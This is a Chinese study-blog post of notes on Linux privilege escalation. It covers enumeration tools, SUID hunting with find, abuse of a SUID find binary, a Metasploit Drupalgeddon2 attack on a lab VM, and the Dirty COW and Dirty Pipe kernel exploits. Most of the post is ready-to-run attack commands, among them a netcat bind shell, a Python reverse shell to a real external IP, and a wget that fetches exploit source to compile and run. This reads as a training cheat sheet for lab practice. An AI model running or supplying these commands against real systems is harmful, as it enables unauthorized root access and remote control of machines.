Linux提权(一)

第103天

查找可利用漏洞及漏洞版本

一个综合类探针:traitor

一个自动化提权:BeRoot(gtfobins&lolbas)

两个信息收集:LinEnum linuxprivchecker

两个漏洞探针:linux-exploit-suggester&2

SUID提权

管理员给一些程序、文件赋予了root权限

nmap

vim

find

Bash

More

Less

Nano

cp

手工探针

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;

LinEnum

将LinEnum.sh上传到目标服务器,然后远程执行,得到对目标的信息收集,看是否存在可利用文件

find

find有suid root权限

touch abc

find abc -exec whoami \;
nc反弹
find abc -exec netcat -lvp 5555 -e /bin/sh \;

netcat xx.xx.xx.xx 5555
python反弹
find xiaodi -exec python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("47.94.236.117",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' \;

nc -lvp 7777

内核漏洞

dcow

vulnhub靶机-探针目标-CMS漏洞利用-脚本探针提权漏洞-利用内核提权-GG
内核漏洞提权过程:寻可用-下exp-上/tmp-编译exp-执行(无权限用chmod)
nmap 192.168.46.0/24
nmap -p1-65535 192.168.46.144
search drupal
use exploit/unix/webapp/drupal_drupalgeddon2
set rhost 192.168.46.144
set rport 1898
run
upload /root/dcow.cpp /tmp/dcow.cpp
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow dcow.cpp -lutil
python -c 'import pty; pty.spawn("/bin/bash")'
./dcow
su root

dirtypipe

Dirty Pipe(CVE-2022-0847)
5.8<=Linux kernel<5.16.11/5.15.25/5.10.102

wget https://haxx.in/files/dirtypipez.c
gcc -o dirtypipez dirtypipez.c
./dirtypipez /usr/bin/su  #任何具体suid权限的文件均可
id
posted @   Arongsec  阅读(162)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 记一次.NET内存居高不下排查解决与启示
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· DeepSeek 开源周回顾「GitHub 热点速览」
点击右上角即可分享
微信分享提示